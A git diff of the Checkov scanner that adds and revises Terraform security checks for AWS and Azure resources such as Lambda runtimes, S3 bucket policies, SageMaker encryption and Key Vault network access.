+    def __init__(self) -> None:
         name = "Ensure Lambda Runtime is not deprecated"
         id = "CKV_AWS_363"
         supported_resources = ['aws_lambda_function']
@@ -15,18 +15,15 @@ def __init__(self):
     def get_inspected_key(self) -> str:
         return "runtime"
 
-    def get_forbidden_values(self):
+    def get_forbidden_values(self) -> List[Any]:
+        # Source: https://docs.aws.amazon.com/lambda/latest/dg/lambda-runtimes.html
         return ["dotnetcore3.1", "nodejs12.x", "python3.6", "python2.7", "dotnet5.0", "dotnetcore2.1", "ruby2.5",
                 "nodejs10.x", "nodejs8.10", "nodejs4.3", "nodejs6.10", "dotnetcore1.0", "dotnetcore2.0",
-                "nodejs4.3-edge", "nodejs",
-                # "python3.7", # Uncomment on Nov 27, 2023
-                # "nodejs14.x", # Uncomment on Nov 27, 2023
-                # "ruby2.7", # Uncomment on Dec 7, 2023
-                # "provided", # Uncomment on Dec 31, 2023
-                # "go1.x", # Uncomment on Dec 31, 2023
-                # "java8", # Uncomment on Dec 31, 2023
-                # "nodejs16.x", # Uncomment on Mar 11, 2024
+                "nodejs4.3-edge", "nodejs", "java8", "python3.7", "go1.x", "provided", "ruby2.7", "nodejs14.x"
+                # "nodejs16.x", # Uncomment on Jun 12, 2024
+                # "python3.8". # Uncomment on Oct 14, 2024
                 # "dotnet7", # Uncomment on May 14, 2024
+                # "dotnet6", # Uncomment on Nov 12, 2024
                 ]
 
 
diff --git a/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py b/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py
index 4f39ffc68a0..3ed728d7ecb 100644
--- a/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py
+++ b/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py
@@ -8,7 +8,7 @@
 
 class ECSClusterLoggingEncryptedWithCMK(BaseResourceCheck):
     def __init__(self) -> None:
-        name = "Ensure ECS Cluster logging uses CMK"
+        name = "Ensure ECS Cluster logging is enabled and client to container communication uses CMK"
         id = "CKV_AWS_224"
         supported_resources = ("aws_ecs_cluster",)
         categories = (CheckCategories.ENCRYPTION,)
diff --git a/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py b/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py
index 99a6544fbc8..563798a01d0 100644
--- a/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py
+++ b/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py
@@ -24,7 +24,7 @@ def get_inspected_key(self) -> str:
         return "version"
 
     def get_expected_values(self) -> list[Any]:
-        return ["1.23", "1.24", "1.25", "1.26", "1.27", "1.28"]
+        return ["1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30"]
 
 
 check = EKSPlatformVersion()
diff --git a/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
index 56fa9aaa522..d98dd54e218 100644
--- a/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
+++ b/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
@@ -19,7 +19,7 @@ def scan_resource_conf(self, conf):
         :return: <CheckResult>
         """
         if "transit_encryption_enabled" in conf.keys() and conf["transit_encryption_enabled"][0] \
-                and "auth_token" in conf.keys():
+                and ("auth_token" in conf.keys() or "user_group_ids" in conf.keys()):
             return CheckResult.PASSED
         return CheckResult.FAILED
 
diff --git a/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py b/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py
index 0c0a03bc601..e1b7dbe45bd 100644
--- a/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py
+++ b/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py
@@ -35,16 +35,31 @@ def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult:
         self.evaluated_keys.append("ebs_block_device")
         blocks = conf.get("ebs_block_device") or []
 
-        allblocks = root + blocks
+        all_blocks = root + blocks
 
-        if not allblocks:
+        if not all_blocks:
             return CheckResult.UNKNOWN
+        all_blocks_results = []
 
-        for block in allblocks:
-            if isinstance(block, dict) and not block.get("encrypted") == [True]:
-                if not block.get("snapshot_id"):
-                    return CheckResult.FAILED
-        return CheckResult.PASSED
+        for block in all_blocks:
+            all_blocks_results.append(_is_block_encrypted(block))
+        if CheckResult.FAILED in all_blocks_results:
+            return CheckResult.FAILED
+        elif CheckResult.UNKNOWN in all_blocks_results:
+            return CheckResult.UNKNOWN
+        else:
+            return CheckResult.PASSED
 
 
 check = LaunchConfigurationEBSEncryption()
+
+
+def _is_block_encrypted(block) -> CheckResult:
+    if isinstance(block, dict):
+        if block.get("encrypted") in ([False], False) and not block.get("snapshot_id"):
+            return CheckResult.FAILED
+        elif block.get("encrypted") in ([True], True):
+            return CheckResult.PASSED
+        elif not block.get("encrypted") in ([True], True) and block.get("snapshot_id"):
+            return CheckResult.PASSED
+    return CheckResult.UNKNOWN
diff --git a/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py b/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py
index ca04b2a8fe0..705f34e5f79 100644
--- a/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py
+++ b/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py
@@ -1,5 +1,5 @@
 from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
-from checkov.common.models.enums import CheckCategories
+from checkov.common.models.enums import CheckCategories, CheckResult
 
 
 class RDSInstancePerformanceInsights(BaseResourceValueCheck):
@@ -10,6 +10,17 @@ def __init__(self) -> None:
         categories = (CheckCategories.LOGGING,)
         super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
 
+    def scan_resource_conf(self, conf):
+        # Performance Insights is not available  for MariaDB and MySQL using certain classes: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_PerfInsights.Overview.Engines.html
+        if conf.get("engine") in (["mariadb"], ["mysql"], ["aws_rds_cluster.default.engine"]):
+            if conf.get("instance_class") in (["db.t2.micro"], ["db.t2.small"], ["db.t3.micro"], ["db.t3.small"],
+                                              ["db.t4g.micro"], ["db.t4g.small"]):
+                return CheckResult.UNKNOWN
+        # Performance Insights is not supported for DB2: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RDS_Fea_Regions_DB-eng.Feature.PerformanceInsights.html
+        if conf.get("engine") in (["db2-se"], ["db2-ae"]):
+            return CheckResult.UNKNOWN
+        return super().scan_resource_conf(conf)
+
     def get_inspected_key(self) -> str:
         return 'performance_insights_enabled'
 
diff --git a/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py b/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py
index 0887adf6391..f47b0e30b51 100644
--- a/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py
+++ b/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py
@@ -25,10 +25,34 @@ def scan_resource_conf(self, conf: dict[str, list[Any]]) -> CheckResult:
             for idx_rule, rule in enumerate(rules):
                 if rule.get("abort_incomplete_multipart_upload") and rule.get("status") == ["Enabled"]:
                     self.evaluated_keys = [f"rule/[{idx_rule}]/abort_incomplete_multipart_upload"]
-                    filter = rule.get("filter")
-                    if filter and isinstance(filter, list) and filter[0]:
-                        # it is possible to set an empty filter, which applies then to all objects
-                        continue
+                    filter_list = rule.get("filter")
+                    if filter_list and isinstance(filter_list, list):
+                        # if filter is empty then rule applies to all paths so we pass
+                        found_non_empty_parameter = False
+                        for filter_item in filter_list:
+                            if isinstance(filter_item, dict):       # check each filter parameter
+                                connected = filter_item.get('and')
+                                if connected and connected[0]:
+                                    filter_item = connected[0]
+                                prefix = filter_item.get('prefix')
+                                if prefix and prefix[0]:
+                                    found_non_empty_parameter = True
+                                    continue
+                                object_size_greater_than = filter_item.get('object_size_greater_than')
+                                if object_size_greater_than and object_size_greater_than[0]:
+                                    found_non_empty_parameter = True
+                                    continue
+                                object_size_less_than = filter_item.get('object_size_less_than')
+                                if object_size_less_than and object_size_less_than[0]:
+                                    found_non_empty_parameter = True
+                                    continue
+                                tag = filter_item.get('tag')
+                                if tag and tag[0]:
+                                    found_non_empty_parameter = True
+                                    continue
+
+                        if found_non_empty_parameter:       # continue searching for rules
+                            continue
 
                     return CheckResult.PASSED
 
diff --git a/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py b/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py
index ae04de38b3a..46c3201687f 100644
--- a/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py
+++ b/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py
@@ -1,4 +1,5 @@
 from json import JSONDecodeError
+import re
 
 from checkov.common.models.enums import CheckResult, CheckCategories
 from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck
@@ -7,9 +8,59 @@
 from typing import List
 
 
+def check_conditions(statement) -> bool:
+    # Check if 'Condition' key exists
+    if 'Condition' not in statement:
+        return False
+
+    condition = statement['Condition']
+
+    # Pass if they define bad ARNs. Assumes they are not too narrow
+    if any(key in condition for key in ['ArnNotEquals', 'ArnNotLike']):
+        return True
+
+    # Handling 'ArnEquals' and 'ArnLike'
+    for arn_key in ['ArnEquals', 'ArnLike']:
+        if arn_key in condition:
+            # Pass unless it is for all IAM ARNs
+            for principal_key in ['aws:PrincipalArn', 'aws:SourceArn']:
+                if principal_key in condition[arn_key]:
+                    principal_arn = condition[arn_key][principal_key]
+                    # Fail if the  Condition is for all ARNs of any resource
+                    if re.match(r'^arn:aws:[a-z0-9-]+::\*.*$', principal_arn):
+                        return False
+            # Passed if 'aws:PrincipalArn' or 'aws:SourceArn' do not match because then they are specific
+            return True
+
+    # Leaves out the NOT conditions as too broad ('StringNotEquals', 'StringNotEqualsIgnoreCase', 'StringNotLike')
+    string_conditions = ['StringEquals', 'StringEqualsIgnoreCase', 'StringLike']
+    if any(condition_type in condition for condition_type in string_conditions):
+        for condition_type in string_conditions:
+            if condition_type in condition:
+                # Purposefully not included: 'aws:SourceIp', 'aws:UserAgent', 'aws:Referer', 'aws:RequestTime',
+                # 'aws:SourceArn', 'aws:PrincipalType', 'aws:RequestTag', 'aws:SecureTransport', 'aws:SourceIp',
+                # 'aws:MultiFactorAuthPresent', 'aws:PrincipalType', all 'Properties of the request',
+                # all 'Properties of the resource', 'aws:PrincipalTag', 'aws:PrincipalIsAWSService',
+                # 'aws:PrincipalServiceName', 'aws:PrincipalServiceNamesList', 'aws:PrincipalType', 'aws:userid',
+                # 'aws:username'
+                if any(source in condition[condition_type] for source in ['aws:sourceVpce', 'aws:SourceVpc',
+                                                                          'aws:PrincipalOrgPaths', 'aws:userid',
+                                                                          'aws:PrincipalArn',
+                                                                          'aws:PrincipalAccount',
+                                                                          'aws:PrincipalOrgID',
+                                                                          'aws:Ec2InstanceSourceVpc',
+                                                                          'ec2:SourceInstanceArn',
+                                                                          'lambda:SourceFunctionArn',
+                                                                          'ssm:SourceInstanceArn']):
+                    return True
+
+    # Default fail if none of the above conditions are met
+    return False
+
+
 class S3AllowsAnyPrincipal(BaseResourceCheck):
 
-    def __init__(self):
+    def __init__(self) -> None:
         name = "Ensure S3 bucket does not allow an action with any Principal"
         id = "CKV_AWS_70"
         supported_resources = ['aws_s3_bucket', 'aws_s3_bucket_policy']
@@ -36,13 +87,16 @@ def scan_resource_conf(self, conf):
                     continue
                 principal = statement['Principal']
                 if principal == '*':
+                    if check_conditions(statement):
+                        return CheckResult.PASSED
                     return CheckResult.FAILED
                 if 'AWS' in statement['Principal']:
                     # Can be a string or an array of strings
                     aws = statement['Principal']['AWS']
                     if (isinstance(aws, str) and aws == '*') or (isinstance(aws, list) and '*' in aws):
+                        if check_conditions(statement):
+                            return CheckResult.PASSED
                         return CheckResult.FAILED
-
         return CheckResult.PASSED
 
     def get_evaluated_keys(self) -> List[str]:
diff --git a/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py b/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py
index 7908da3a9de..923b797dbca 100644
--- a/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py
+++ b/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py
@@ -14,7 +14,7 @@ def __init__(self) -> None:
 
     def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult:
         lock_conf = conf.get("object_lock_configuration")
-        if lock_conf and lock_conf[0]:
+        if lock_conf and lock_conf[0] and isinstance(lock_conf[0], dict):
             lock_enabled = lock_conf[0].get("object_lock_enabled")
             if lock_enabled in ["Enabled", ["Enabled"]]:
                 return CheckResult.PASSED
diff --git a/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py b/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py
index 2dc4d13d164..21cd4aff5ff 100644
--- a/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py
+++ b/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py
@@ -1,6 +1,6 @@
 from typing import Any
 
-from checkov.common.models.enums import CheckCategories
+from checkov.common.models.enums import CheckCategories, CheckResult
 from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
 from checkov.common.models.consts import ANY_VALUE
 
@@ -13,6 +13,11 @@ def __init__(self) -> None:
         categories = (CheckCategories.ENCRYPTION,)
         super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
 
+    def scan_resource_conf(self, conf):
+        if conf.get("type")[0] != "SecureString":
+            return CheckResult.PASSED
+        return super().scan_resource_conf(conf)
+
     def get_inspected_key(self) -> str:
         return "key_id"
 
diff --git a/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py
new file mode 100644
index 00000000000..05e714b76ba
--- /dev/null
+++ b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py
@@ -0,0 +1,21 @@
+from checkov.common.models.consts import ANY_VALUE
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerDataQualityJobDefinitionEncryption(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts"
+        id = "CKV_AWS_367"
+        supported_resources = ['aws_sagemaker_data_quality_job_definition']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return "data_quality_job_output_config/[0]/kms_key_id"
+
+    def get_expected_value(self):
+        return ANY_VALUE
+
+
+check = SagemakerDataQualityJobDefinitionEncryption()
diff --git a/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py
new file mode 100644
index 00000000000..7bd22d9ef5d
--- /dev/null
+++ b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py
@@ -0,0 +1,17 @@
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerDataQualityJobDefinitionTrafficEncryption(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs"
+        id = "CKV_AWS_369"
+        supported_resources = ['aws_sagemaker_data_quality_job_definition']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return "network_config/[0]/enable_inter_container_traffic_encryption"
+
+
+check = SagemakerDataQualityJobDefinitionTrafficEncryption()
diff --git a/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py
new file mode 100644
index 00000000000..70539e19156
--- /dev/null
+++ b/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py
@@ -0,0 +1,21 @@
+from checkov.common.models.consts import ANY_VALUE
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerDataQualityJobDefinitionVolumeEncryption(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume"
+        id = "CKV_AWS_368"
+        supported_resources = ['aws_sagemaker_data_quality_job_definition']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return "job_resources/[0]/cluster_config/[0]/volume_kms_key_id"
+
+    def get_expected_value(self):
+        return ANY_VALUE
+
+
+check = SagemakerDataQualityJobDefinitionVolumeEncryption()
diff --git a/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py b/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py
index 70b6d7f5980..a73419f486f 100644
--- a/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py
+++ b/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py
@@ -5,9 +5,9 @@
 
 class SagemakerDomainEncryptedWithCMK(BaseResourceValueCheck):
     def __init__(self):
-        name = "Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK)"
+        name = "Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)"
         id = "CKV_AWS_187"
-        supported_resources = ['aws_sagemaker_domain']
+        supported_resources = ['aws_sagemaker_domain', 'aws_sagemaker_notebook_instance']
         categories = [CheckCategories.ENCRYPTION]
         super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
 
diff --git a/checkov/terraform/checks/resource/aws/SagemakerFlowDefinitionUsesKMS.py b/checkov/terraform/checks/resource/aws/SagemakerFlowDefinitionUsesKMS.py
new file mode 100644
index 00000000000..57726c8b7c4
--- /dev/null
+++ b/checkov/terraform/checks/resource/aws/SagemakerFlowDefinitionUsesKMS.py
@@ -0,0 +1,21 @@
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+from checkov.common.models.consts import ANY_VALUE
+
+
+class SagemakerFlowDefinitionUsesKMS(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon SageMaker Flow Definition uses KMS for output configurations"
+        id = "CKV_AWS_372"
+        supported_resources = ['aws_sagemaker_flow_definition']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return "output_config/[0]/kms_key_id"
+
+    def get_expected_value(self):
+        return ANY_VALUE
+
+
+check = SagemakerFlowDefinitionUsesKMS()
diff --git a/checkov/terraform/checks/resource/aws/SagemakerModelWithNetworkIsolation.py b/checkov/terraform/checks/resource/aws/SagemakerModelWithNetworkIsolation.py
new file mode 100644
index 00000000000..313f2c50163
--- /dev/null
+++ b/checkov/terraform/checks/resource/aws/SagemakerModelWithNetworkIsolation.py
@@ -0,0 +1,17 @@
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SagemakerModelWithNetworkIsolation(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon SageMaker model uses network isolation"
+        id = "CKV_AWS_370"
+        supported_resources = ['aws_sagemaker_model']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return "enable_network_isolation"
+
+
+check = SagemakerModelWithNetworkIsolation()
diff --git a/checkov/terraform/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py b/checkov/terraform/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py
new file mode 100644
index 00000000000..d02840506d5
--- /dev/null
+++ b/checkov/terraform/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py
@@ -0,0 +1,20 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class SagemakerNotebookInstanceAllowsIMDSv2(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2"
+        id = "CKV_AWS_371"
+        supported_resources = ['aws_sagemaker_notebook_instance']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return 'instance_metadata_service_configuration/[0]/minimum_instance_metadata_service_version'
+
+    def get_expected_value(self):
+        return "2"
+
+
+check = SagemakerNotebookInstanceAllowsIMDSv2()
diff --git a/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py b/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py
index 198346ac221..34c90a8923f 100644
--- a/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py
+++ b/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py
@@ -4,7 +4,7 @@
 
 class SecurityGroupRuleDescription(BaseResourceCheck):
     def __init__(self):
-        name = "Ensure every security groups rule has a description"
+        name = "Ensure every security group and rule has a description"
         id = "CKV_AWS_23"
         supported_resource = [
             'aws_security_group',
diff --git a/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py b/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py
index 7056f916518..fb79f419378 100644
--- a/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py
+++ b/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py
@@ -21,7 +21,7 @@ def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
             statement = rule.get("statement")
             if statement:
                 self.evaluated_keys = [f"rule/[{idx_rule}]/statement/[0]/managed_rule_group_statement"]
-                if not isinstance(statement, list):
+                if not isinstance(statement, list) or not isinstance(statement[0], dict):
                     return CheckResult.UNKNOWN
                 managed_group = statement[0].get("managed_rule_group_statement")
                 if managed_group:
diff --git a/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py b/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py
index 7e97c5dd4c5..a25460c806a 100644
--- a/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py
+++ b/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py
@@ -36,6 +36,8 @@ def scan_resource_conf(self, conf: dict[str, list[Any]]) -> CheckResult:
                 statements = rule.get('statement')
                 if statements and isinstance(statements, list):
                     for statement in statements:
+                        if not isinstance(statement, dict):
+                            continue
                         if statement.get('managed_rule_group_statement'):
                             passing = True
 
diff --git a/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py b/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py
new file mode 100644
index 00000000000..b5b92b497d2
--- /dev/null
+++ b/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py
@@ -0,0 +1,17 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class ACRDedicatedDataEndpointEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure dedicated data endpoints are enabled."
+        id = "CKV_AZURE_237"
+        supported_resources = ("azurerm_container_registry",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "data_endpoint_enabled"
+
+
+check = ACRDedicatedDataEndpointEnabled()
diff --git a/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py b/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py
index d3d86d41151..2249f55ac5b 100644
--- a/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py
+++ b/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py
@@ -21,14 +21,14 @@ def scan_resource_conf(self, conf) -> CheckResult:
             if site_config.get('application_stack') and isinstance(site_config.get('application_stack'), list):
                 stack = site_config.get('application_stack')[0]
                 if stack.get('dotnet_version') and isinstance(stack.get('dotnet_version'), list):
-                    if stack.get('dotnet_version')[0] == "v7.0":
+                    if stack.get('dotnet_version')[0] == "v8.0":
                         return CheckResult.PASSED
                     return CheckResult.FAILED
 
         return CheckResult.UNKNOWN
 
     def get_expected_values(self) -> List[str]:
-        return ["v6.0", "v7.0"]
+        return ["v6.0", "v8.0"]
 
 
 check = AppServiceDotnetFrameworkVersion()
diff --git a/checkov/terraform/checks/resource/azure/AzureSparkPoolIsolatedComputeEnabled.py b/checkov/terraform/checks/resource/azure/AzureSparkPoolIsolatedComputeEnabled.py
new file mode 100644
index 00000000000..ffead4481e7
--- /dev/null
+++ b/checkov/terraform/checks/resource/azure/AzureSparkPoolIsolatedComputeEnabled.py
@@ -0,0 +1,17 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class AzureSparkPoolIsolatedComputeEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure isolated compute is enabled for Synapse Spark pools"
+        id = "CKV_AZURE_242"
+        supported_resources = ("azurerm_synapse_spark_pool",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "compute_isolation_enabled"
+
+
+check = AzureSparkPoolIsolatedComputeEnabled()
diff --git a/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py b/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py
new file mode 100644
index 00000000000..3128d231ab7
--- /dev/null
+++ b/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py
@@ -0,0 +1,21 @@
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class CognitiveServicesDisablesPublicNetwork(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure that all Azure Cognitive Services accounts are configured with a managed identity"
+        id = "CKV_AZURE_238"
+        supported_resources = ['azurerm_cognitive_account']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return "identity/[0]/type"
+
+    def get_expected_value(self):
+        return ANY_VALUE
+
+
+check = CognitiveServicesDisablesPublicNetwork()
diff --git a/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py b/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py
new file mode 100644
index 00000000000..4ffef689769
--- /dev/null
+++ b/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py
@@ -0,0 +1,25 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class CognitiveServicesEnableLocalAuth(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure that Cognitive Services accounts disable local authentication"
+        id = "CKV_AZURE_236"
+        supported_resources = ('azurerm_cognitive_account', )
+        categories = (CheckCategories.NETWORKING, )
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+        )
+
+    def get_inspected_key(self):
+        return 'local_auth_enabled'
+
+    def get_expected_value(self):
+        return False
+
+
+check = CognitiveServicesEnableLocalAuth()
diff --git a/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py b/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py
index f79c9f79217..357af9c78fd 100644
--- a/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py
+++ b/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py
@@ -5,7 +5,7 @@
 
 class DatabricksWorkspaceIsNotPublic(BaseResourceNegativeValueCheck):
     def __init__(self):
-        name = "Ensure that databricks workspace is not public"
+        name = "Ensure Databricks Workspace data plane to control plane communication happens over private link"
         id = "CKV_AZURE_158"
         supported_resources = ['azurerm_databricks_workspace']
         categories = [CheckCategories.NETWORKING]
diff --git a/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py b/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py
index 73590c14acd..35798e5123b 100644
--- a/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py
+++ b/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py
@@ -38,6 +38,13 @@ def scan_resource_conf(self, conf) -> CheckResult:
                         ip_rules = ip_rules[0] if ip_rules and isinstance(ip_rules, list) else ip_rules
                         if ip_rules:
                             return CheckResult.PASSED
+                        virtual_network_subnet_ids = network_acl.get("virtual_network_subnet_ids")
+                        # Get first element in virtual_network_subnet_ids (as parser wrap it with list).
+                        virtual_network_subnet_ids = virtual_network_subnet_ids[0] \
+                            if virtual_network_subnet_ids and isinstance(virtual_network_subnet_ids, list) \
+                            else virtual_network_subnet_ids
+                        if virtual_network_subnet_ids:
+                            return CheckResult.PASSED
 
